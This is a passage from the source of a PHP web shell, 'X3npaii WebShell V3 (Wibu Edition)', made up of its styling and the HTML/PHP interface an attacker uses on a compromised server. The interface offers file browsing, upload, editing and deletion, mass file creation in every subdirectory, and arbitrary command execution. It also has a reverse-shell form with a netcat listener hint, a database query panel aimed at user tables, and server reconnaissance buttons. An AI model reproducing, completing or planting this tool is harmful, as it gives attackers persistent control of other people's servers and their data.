button:hover,
input[type="submit"]:hover,
.button:hover {
background: linear-gradient(135deg, var(--secondary-color), var(--main-color));
box-shadow: 0 0 15px rgba(255, 105, 180, 0.5);
transform: translateY(-2px);
}
button:active,
input[type="submit"]:active,
.button:active {
transform: translateY(0);
}
.file-list {
width: 100%;
border-collapse: separate;
border-spacing: 0;
margin-bottom: 15px;
overflow-x: auto;
display: block;
}
.file-list th {
background: rgba(255, 105, 180, 0.3);
padding: 12px;
text-align: left;
position: sticky;
top: 0;
backdrop-filter: blur(5px);
}
.file-list td {
padding: 10px 12px;
border-bottom: 1px solid rgba(255, 105, 180, 0.2);
}
.file-list tr:last-child td {
border-bottom: none;
}
.file-list tr:hover {
background: rgba(255, 105, 180, 0.1);
}
.file-list a {
color: var(--main-color);
text-decoration: none;
transition: all 0.2s;
display: inline-flex;
align-items: center;
}
.file-list a:hover {
color: var(--secondary-color);
text-decoration: underline;
}
.file-list a::before {
content: "→";
margin-right: 5px;
font-size: 0.8em;
}
.file-actions {
display: flex;
gap: 8px;
flex-wrap: wrap;
}
.file-actions a {
color: var(--text-color);
background: rgba(255, 105, 180, 0.3);
padding: 3px 8px;
border-radius: 4px;
font-size: 0.8rem;
text-decoration: none;
transition: all 0.2s;
}
.file-actions a:hover {
background: rgba(255, 105, 180, 0.5);
text-decoration: none;
}
.terminal-output {
background: rgba(0, 0, 0, 0.7);
color: #0f0;
padding: 15px;
border-radius: 8px;
font-family: "Courier New", monospace;
overflow-x: auto;
margin-bottom: 15px;
border: 1px solid rgba(0, 255, 0, 0.3);
max-height: 300px;
overflow-y: auto;
}
.tab-container {
margin-bottom: 15px;
}
.tab-buttons {
display: flex;
border-bottom: 1px solid var(--main-color);
overflow-x: auto;
scrollbar-width: none;
}
.tab-buttons::-webkit-scrollbar {
display: none;
}
.tab-button {
padding: 10px 15px;
background: rgba(26, 26, 46, 0.7);
border: none;
border-radius: 8px 8px 0 0;
margin-right: 5px;
cursor: pointer;
color: var(--text-color);
font-size: 0.9rem;
white-space: nowrap;
transition: all 0.2s;
position: relative;
}
.tab-button::after {
content: "";
position: absolute;
bottom: -1px;
left: 0;
right: 0;
height: 2px;
background: transparent;
transition: all 0.2s;
}
.tab-button.active {
background: rgba(255, 105, 180, 0.3);
color: var(--main-color);
}
.tab-button.active::after {
background: var(--main-color);
}
.tab-content {
display: none;
padding: 15px 0;
animation: fadeIn 0.3s ease-in-out;
}
.tab-content.active {
display: block;
}
.quick-commands {
display: grid;
grid-template-columns: repeat(auto-fill, minmax(120px, 1fr));
gap: 10px;
margin-bottom: 15px;
}
.quick-commands button {
padding: 8px;
font-size: 0.8rem;
}
/* Database Manager Styles */
.db-tables {
margin-bottom: 20px;
}
.db-tables h3 {
color: var(--main-color);
margin-bottom: 10px;
}
.table-grid {
display: grid;
grid-template-columns: repeat(auto-fill, minmax(200px, 1fr));
gap: 15px;
}
.table-item {
background: rgba(255, 105, 180, 0.1);
border: 1px solid var(--main-color);
border-radius: 8px;
padding: 12px;
cursor: pointer;
transition: all 0.2s;
}
.table-item:hover {
background: rgba(255, 105, 180, 0.2);
transform: translateY(-2px);
box-shadow: 0 5px 10px rgba(255, 105, 180, 0.2);
}
.table-icon {
font-size: 24px;
margin-bottom: 5px;
color: var(--main-color);
}
.table-name {
font-weight: bold;
margin-bottom: 5px;
color: var(--text-color);
}
.table-stats {
font-size: 0.8rem;
color: #aaa;
}
.db-results {
margin-top: 20px;
}
.query-info {
color: #aaa;
font-size: 0.8rem;
margin-bottom: 10px;
}
.table-responsive {
overflow-x: auto;
margin-bottom: 15px;
}
.db-table {
width: 100%;
border-collapse: collapse;
margin-bottom: 15px;
}
.db-table th {
background: rgba(255, 105, 180, 0.3);
padding: 10px;
text-align: left;
position: sticky;
top: 0;
}
.db-table td {
padding: 8px 10px;
border-bottom: 1px solid rgba(255, 105, 180, 0.1);
}
.db-table tr:hover {
background: rgba(255, 105, 180, 0.1);
}
.footer {
text-align: center;
margin-top: 20px;
font-size: 0.7rem;
color: #aaa;
padding: 10px;
background: var(--bg-color);
border-radius: 8px;
backdrop-filter: blur(5px);
}
.anime-char {
position: fixed;
bottom: 20px;
right: 20px;
width: 120px;
opacity: 0.8;
z-index: -1;
filter: drop-shadow(0 0 5px rgba(255, 105, 180, 0.7));
animation: float 3s ease-in-out infinite;
}
@keyframes float {
0%, 100% { transform: translateY(0); }
50% { transform: translateY(-10px); }
}
@keyframes fadeIn {
from { opacity: 0; transform: translateY(10px); }
to { opacity: 1; transform: translateY(0); }
}
/* Mobile optimizations */
@media (max-width: 768px) {
.wrapper {
padding: 10px;
}
.header h1 {
font-size: 1.3rem;
}
.panel {
padding: 12px;
}
.file-list td, .file-list th {
padding: 8px 10px;
font-size: 0.8rem;
}
.file-actions {
flex-direction: column;
gap: 4px;
}
.file-actions a {
padding: 2px 5px;
font-size: 0.7rem;
}
.quick-commands {
grid-template-columns: repeat(auto-fill, minmax(100px, 1fr));
}
.table-grid {
grid-template-columns: repeat(auto-fill, minmax(150px, 1fr));
}
.anime-char {
width: 80px;
bottom: 10px;
right: 10px;
}
}
/* Custom scrollbar */
::-webkit-scrollbar {
width: 8px;
height: 8px;
}
::-webkit-scrollbar-track {
background: rgba(0, 0, 0, 0.2);
border-radius: 10px;
}
::-webkit-scrollbar-thumb {
background: var(--main-color);
border-radius: 10px;
}
::-webkit-scrollbar-thumb:hover {
background: var(--secondary-color);
}
</style>
<script>
function showTab(tabId) {
document.querySelectorAll(".tab-content").forEach(tab => {
tab.classList.remove("active");
});
document.querySelectorAll(".tab-button").forEach(btn => {
btn.classList.remove("active");
});
document.getElementById(tabId).classList.add("active");
event.currentTarget.classList.add("active");
}
function selectAllFiles(source) {
const checkboxes = document.querySelectorAll("input[name=\'sel[]\']");
checkboxes.forEach(checkbox => {
checkbox.checked = source.checked;
});
}
function copyToClipboard(text) {
navigator.clipboard.writeText(text).then(() => {
alert("Copied to clipboard!");
}).catch(err => {
console.error("Failed to copy: ", err);
});
}
</script>
</head>
<body>
<div class="wrapper">
<div class="header">
<h1>X3npaii WebShell V3 <span style="font-size:0.7rem;color:#aaa;">(Wibu Edition)</span></h1>
<div class="info">
<span>OS: '.htmlspecialchars(php_uname()).'</span>
<span>PHP: '.phpversion().'</span>
<span>Bypass: LiteSpeed='.$is_litespeed.'</span>
</div>
</div>
<div class="message-container">
'.$message.'
</div>
<div class="container">
<div class="panel">
<h2>File Manager</h2>
<div class="tab-container">
<div class="tab-buttons">
<button class="tab-button active" onclick="showTab(\'file-explorer\')">Explorer</button>
<button class="tab-button" onclick="showTab(\'file-upload\')">Upload</button>
<button class="tab-button" onclick="showTab(\'file-ops\')">Operations</button>
</div>
<div id="file-explorer" class="tab-content active">
<form method="GET">
<input type="text" name="path" value="'.htmlspecialchars($current_dir).'" placeholder="Path">
<button type="submit">Go</button>
</form>
<table class="file-list">
<thead>
<tr>
<th><input type="checkbox" onclick="selectAllFiles(this)"></th>
<th>Name</th>
<th>Size</th>
<th>Perms</th>
<th>Actions</th>
</tr>
</thead>
<tbody>
<tr>
<td></td>
<td><a href="?path='.urlencode(dirname($current_dir)).'">.. (Parent)</a></td>
<td></td>
<td></td>
<td></td>
</tr>';
// List files and directories
$files = @scandir($current_dir);
if ($files) {
foreach ($files as $file) {
if ($file == '.' || $file == '..') continue;
$full_path = $current_dir . '/' . $file;
$is_dir = @is_dir($full_path);
$size = $is_dir ? '-' : format_size(@filesize($full_path));
$perms = substr(sprintf('%o', @fileperms($full_path)), -4);
echo '<tr>
<td><input type="checkbox" name="sel[]" value="'.htmlspecialchars($file).'"></td>
<td>';
if ($is_dir) {
echo '<a href="?path='.urlencode($full_path).'">'.htmlspecialchars($file).'/</a>';
} else {
echo htmlspecialchars($file);
}
echo '</td>
<td>'.$size.'</td>
<td>'.$perms.'</td>
<td class="file-actions">';
if (!$is_dir) {
echo '<a href="?path='.urlencode($current_dir).'&download='.urlencode($file).'">Download</a>';
echo '<a href="?path='.urlencode($current_dir).'&edit='.urlencode($file).'">Edit</a>';
if (preg_match('/\.(zip|rar|tar|gz)$/i', $file)) {
echo '<a href="?path='.urlencode($current_dir).'&extract='.urlencode($file).'">Extract</a>';
}
}
echo '<a href="?path='.urlencode($current_dir).'&delete='.urlencode($file).'" onclick="return confirm(\'Are you sure?\')">Delete</a>
</td>
</tr>';
}
}
echo '
</tbody>
</table>
<form method="POST">
<input type="hidden" name="path" value="'.htmlspecialchars($current_dir).'">
<div style="display: flex; gap: 10px; align-items: center; margin-bottom: 15px;">
<span>Selected:</span>
<select name="action" style="flex: 1;">
<option value="delete">Delete</option>
<option value="chmod">Change Permissions</option>
<option value="rename">Rename</option>
<option value="move">Move To</option>
</select>
</div>
<input type="text" name="action_value" placeholder="New name/permissions/path">
<button type="submit" name="file_action">Execute</button>
</form>
</div>
<div id="file-upload" class="tab-content">
<form method="POST" enctype="multipart/form-data">
<input type="file" name="upload" style="margin-bottom: 15px;">
<button type="submit" name="upload_file">Upload</button>
</form>
<form method="POST">
<input type="text" name="newfile" placeholder="New filename">
<button type="submit">Create File</button>
</form>
<form method="POST">
<input type="text" name="newdir" placeholder="New directory name">
<button type="submit">Create Directory</button>
</form>
</div>
<div id="file-ops" class="tab-content">
<form method="POST">
<h3 style="margin-bottom: 10px;">Mass File Creation</h3>
<input type="text" name="mass_filename" placeholder="Filename to create" required>
<textarea name="mass_note" placeholder="File content" rows="3"></textarea>
<button type="submit" name="mass_create">Create in All Subdirectories</button>
</form>
<div style="margin-top: 15px;">
<h3 style="margin-bottom: 10px;">Shell Lock</h3>
<div style="display: flex; gap: 10px;">
<a href="?lock=enable" class="button">Enable Lock</a>
<a href="?lock=disable" class="button">Disable Lock</a>
</div>
</div>
</div>
</div>
</div>
<div class="panel">
<h2>Command Execution</h2>
<form method="POST">
<input type="text" name="exec" placeholder="Command" value="'.(isset($_POST['exec']) ? htmlspecialchars($_POST['exec']) : '').'">
<button type="submit">Execute</button>
</form>';
if (!empty($cmd_output)) {
echo '<div class="terminal-output"><pre>'.htmlspecialchars($cmd_output).'</pre></div>';
}
echo '
<div class="tab-container">
<div class="tab-buttons">
<button class="tab-button active" onclick="showTab(\'reverse-shell\')">Reverse Shell</button>
<button class="tab-button" onclick="showTab(\'db-manager\')">Database</button>
</div>
<div id="reverse-shell" class="tab-content active">
<form method="POST">
<input type="text" name="ip" placeholder="Your IP" required>
<input type="text" name="port" placeholder="Port" required>
<button type="submit" name="reverse_shell">Connect</button>
</form>
<p style="margin-top: 10px; font-size: 0.8rem; color: #aaa;">Example: nc -lvnp [PORT] to listen</p>
</div>
<div id="db-manager" class="tab-content">
<form method="POST" id="db-form">
<div style="display: grid; grid-template-columns: 1fr 1fr; gap: 15px; margin-bottom: 15px;">
<div>
<label style="display: block; margin-bottom: 5px; color: #aaa; font-size: 0.8rem;">Database Type</label>
<select name="db_type" required style="width: 100%;">
<option value="mysql">MySQL</option>
<option value="mariadb">MariaDB</option>
<option value="postgresql">PostgreSQL</option>
<option value="sqlite">SQLite</option>
</select>
</div>
<div>
<label style="display: block; margin-bottom: 5px; color: #aaa; font-size: 0.8rem;">Host</label>
<input type="text" name="db_host" placeholder="localhost" value="localhost">
</div>
<div>
<label style="display: block; margin-bottom: 5px; color: #aaa; font-size: 0.8rem;">Username</label>
<input type="text" name="db_user" placeholder="Username">
</div>
<div>
<label style="display: block; margin-bottom: 5px; color: #aaa; font-size: 0.8rem;">Password</label>
<input type="password" name="db_pass" placeholder="Password">
</div>
<div>
<label style="display: block; margin-bottom: 5px; color: #aaa; font-size: 0.8rem;">Database</label>
<input type="text" name="db_name" placeholder="Database name">
</div>
<div>
<label style="display: block; margin-bottom: 5px; color: #aaa; font-size: 0.8rem;">Quick Connect</label>
<button type="button" onclick="document.getElementById(\'db_query\').value=\'SHOW TABLES\';document.forms[\'db-form\'].submit();" style="width: 100%; padding: 8px; font-size: 0.8rem;">
Show Tables
</button>
</div>
</div>
<textarea id="db_query" name="db_query" placeholder="SQL Query" rows="3" style="font-family: monospace;">'.(isset($_POST['db_query']) ? htmlspecialchars($_POST['db_query']) : 'SELECT * FROM users LIMIT 10;').'</textarea>
<div style="display: flex; gap: 10px; margin-top: 10px;">
<button type="submit" name="db_manager" style="flex: 1;">Execute</button>
<button type="button" onclick="copyToClipboard(document.getElementById(\'db_query\').value)" style="flex: 0 0 auto; padding: 0 15px;">
Copy
</button>
</div>
</form>
</div>
</div>
</div>
<div class="panel">
<h2>Quick Actions</h2>
<div class="quick-commands">
<button type="submit" form="quick-cmd" name="exec" value="id">id</button>
<button type="submit" form="quick-cmd" name="exec" value="uname -a">uname -a</button>
<button type="submit" form="quick-cmd" name="exec" value="pwd">pwd</button>
<button type="submit" form="quick-cmd" name="exec" value="ls -la">ls -la</button>
<button type="submit" form="quick-cmd" name="exec" value="df -h">df -h</button>
<button type="submit" form="quick-cmd" name="exec" value="free -m">free -m</button>
<button type="submit" form="quick-cmd" name="exec" value="phpinfo();">phpinfo()</button>
<button type="submit" form="quick-cmd" name="exec" value="print_r(get_defined_functions());">Functions</button>
</div>
<form id="quick-cmd" method="POST" style="display: none;"></form>
<div style="margin-top: 15px;">
<h3 style="margin-bottom: 10px;">Server Info</h3>
<div style="background: rgba(0, 0, 0, 0.3); padding: 10px; border-radius: 8px; font-family: monospace; font-size: 0.8rem;">
<div>OS: '.php_uname().'</div>
<div>PHP: '.phpversion().'</div>
<div>Server: '.@$_SERVER['SERVER_SOFTWARE'].'</div>
<div>User: '.@get_current_user().'</div>
<div>Disabled: '.@ini_get('disable_functions').'</div>
</div>
</div>
</div>
</div>
<div class="footer">
X3npaii WebShell V3 - Wibu Edition | Access Count: '.$access_count.' | '.date('Y-m-d H:i:s').'
</div>
</div>
<img src="https://i.imgur.com/5a4e8a8f7a5.png " class="anime-char" alt="Anime Character">
</body>
</html>';
}
?>